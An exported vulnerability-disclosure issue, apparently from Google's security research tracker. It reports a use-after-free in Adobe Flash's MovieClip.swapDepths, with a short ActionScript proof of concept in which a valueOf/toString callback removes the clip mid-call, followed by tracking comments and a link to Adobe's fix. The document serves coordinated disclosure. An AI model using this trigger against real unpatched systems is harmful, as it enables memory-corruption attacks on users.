VegarLH / google-security-research

Automatically exported from code.google.com/p/google-security-research
0 stars 0 forks source link

Adobe Flash: use-after-free in swapDepths #403

Closed GoogleCodeExporter closed 9 years ago

GoogleCodeExporter commented 9 years ago
There is a use-after-free in MovieClip.swapDepths, a POC is as follows:

var clip1 = this.createEmptyMovieClip("clip1", 1);
var clip2 = this.createEmptyMovieClip("clip2", 2);

var n = {valueOf: func, toString: func};

clip1.swapDepths(n);

function func(){

    clip1.removeMovieClip();
    //_root.createEmptyMovieClip("test", 1);

    trace("here");
    return "clip2";
    }

A swf and fla are attached.

This bug is subject to a 90 day disclosure deadline. If 90 days elapse
without a broadly available patch, then the bug report will automatically
become visible to the public.

Original issue reported on code.google.com by natashe...@google.com on 22 May 2015 at 2:21

Attachments:

GoogleCodeExporter commented 9 years ago
PSIRT-3737

Original comment by cev...@google.com on 26 May 2015 at 10:18

GoogleCodeExporter commented 9 years ago

Original comment by scvi...@google.com on 28 May 2015 at 5:00

GoogleCodeExporter commented 9 years ago

Original comment by natashe...@google.com on 11 Aug 2015 at 3:31

GoogleCodeExporter commented 9 years ago

Original comment by natashe...@google.com on 11 Aug 2015 at 3:57

GoogleCodeExporter commented 9 years ago
Fixed in https://helpx.adobe.com/security/products/flash-player/apsb15-19.html

Original comment by natashe...@google.com on 18 Aug 2015 at 7:35